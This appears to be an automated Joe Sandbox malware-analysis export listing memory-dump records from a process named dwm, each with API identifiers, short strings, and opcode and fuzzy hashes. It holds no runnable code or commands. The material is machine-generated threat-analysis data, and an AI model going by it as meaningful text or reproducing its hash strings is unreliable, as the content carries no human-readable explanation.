                                            • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction ID: 5cc8f2eb411d0b4343f6501bf08eb86cf89b31ae9cbe0c75fe8bcf3bc290a203
                                            • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction Fuzzy Hash: 8A113D36605B50D3EB24CB21F40C21AA7B0FF45B80F854126DE8D07BA4EB7ECA58CB84
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000003.1782701460.00000262F1DC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000262F1DC0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_3_262f1dc0000_dwm.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: 45197141dea0fdbc2dc789ccba534068671fe345acb138f35142295ed4ef596a
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: F9519D33204BA1CAEB788F22A14C35877B0F354BD8F984916DA8947FD9DB3AC458DB01
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: CallEncodePointerTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3544855599-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: cff8e054d45727210f342f56c6f130d4c2d6b4d6bc712633baea4b7e334805f1
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: A161AC32508BC4C6EB248F15E44879AB7B0F785B98F848215EF9813F99DB7DC298CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: d0ede950576c549fa59b874e259b4a4ce2916a0af2a89e7bd1f7dc29efb66418
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: C2519F36200BA4CBEB788F22D54C35877B1F754B98F948116DA9947FD5CB3ACA68CB01
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID: pid_
                                            • API String ID: 517849248-4147670505
                                            • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction ID: e1107612ec29285105f426af2682408a23f5990602284a2c2e3475d3decf5783
                                            • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction Fuzzy Hash: 2B115171314FA1E2EB109B36E80C35A67B4FB84780FD54125EE4987E98EF6ACA4DC700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                            • String ID:
                                            • API String ID: 2718003287-0
                                            • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction ID: fab21034f37749d0764c7a094826087ce2baf9ef234d4ae925340f48f693a9dc
                                            • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction Fuzzy Hash: 5FD1CC32B14AA5C9E711CFA9D4482DC3BB1F354B98F84421ADF5DA7F99DA36C50AC340
                                            APIs
                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000262F1E028DF), ref: 00000262F1E02A12
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: ConsoleMode
                                            • String ID:
                                            • API String ID: 4145635619-0
                                            • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction ID: aa50052e892c755e89d0f4316aac242c37ea8d177f6c047af74f619aae85348e
                                            • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction Fuzzy Hash: 4D91CF32610E72C9FB648F65949C3AD2BF0F759F98FC8410ADE4A67E85DA36C489C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction ID: 4df9a9dadee2755cd8d95746c49c9ca14734ed879e3710f7773d6d88bc73d5a6
                                            • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction Fuzzy Hash: EF718E36200FA2C2EB749E66985C3AA77B4F395BC4F85401ADD4A57F89DA36CB4CC740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000003.1782701460.00000262F1DC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000262F1DC0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_3_262f1dc0000_dwm.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 3242871069-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: 4911c39bb0ee4098dd60656a026204a0110c7ad6f1277901effdb21ea04660d3
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: 7F51B432311E20CADB54CF56E44CF6D73B2F394B98F958A25DA4647B88D77AD849C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000003.1782701460.00000262F1DC0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000262F1DC0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_3_262f1dc0000_dwm.jbxd
                                            Similarity
                                            • API ID: CallTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3163161869-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: 557a6789f5187bc5074069dbd349a370ffa854fa06ce06f849a716dfe5d322b7
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: 3761CD72508FC4C2EB358F19E44879AB7B0F785B88F844A15EB9813F99CB79C098CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction ID: 77e7a4369789b78505a750bb74a9998a2519af63b9d4ac8f247581a78fb1a9d9
                                            • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction Fuzzy Hash: 0B51E136208FA1D1EE24DE2AA45C3AA67B1F795B90FC50029DE5943F99DB3BC60CC740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction ID: 5807687a0749368f9fc8b5a9b7756883f5ade9cd1dba01989b1759afd8963555
                                            • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction Fuzzy Hash: 5641B232625EA1C6EB60CF65E44C79AA7B0F388B94FC44125EE4D87F58EB39C449CB40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction ID: 1cf7644179d68b3ffb39a7e968ddda197dd02b7a467be2fbdcf623f8a8e87045
                                            • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction Fuzzy Hash: 7B115B32614F9082EB248F15F418249B7F1FB88B88F984225EE8D07B68DF3DC655CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction ID: b3efab4190b7abe3c3269f8cce79560c780198ad7ed2a5cb25c70f9bcf6bc0b6
                                            • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction Fuzzy Hash: CE118031A01F90C5EA14DB6AA80C25977F4FB88FD0F984124DE4E53B65EF39D546C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction ID: 1e133ff160d67c75a1e658c810bb067d0606d2ae022ef74b82297dd88762e49b
                                            • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction Fuzzy Hash: 62E03231A01E14DAE7288B62D80C36936E1EB8CF05F888024CD0907B60EF7E849D8B80
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2914082572.00000262F1DF1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1DF0000, based on PE: true
                                            • Associated: 0000000E.00000002.2913983123.00000262F1DF0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914203103.00000262F1E05000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914308548.00000262F1E10000.00000004.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914460339.00000262F1E12000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000E.00000002.2914537565.00000262F1E19000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_262f1df0000_dwm.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction ID: adec290430aa535978ac7d52b76ae94b686b2f6104f9958c4eb5500b4e524a32
                                            • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction Fuzzy Hash: 7CE0E571611E14EAE7289B62D80C26976F1FF8CF15FC88064CD0907B20EE3A849D9A10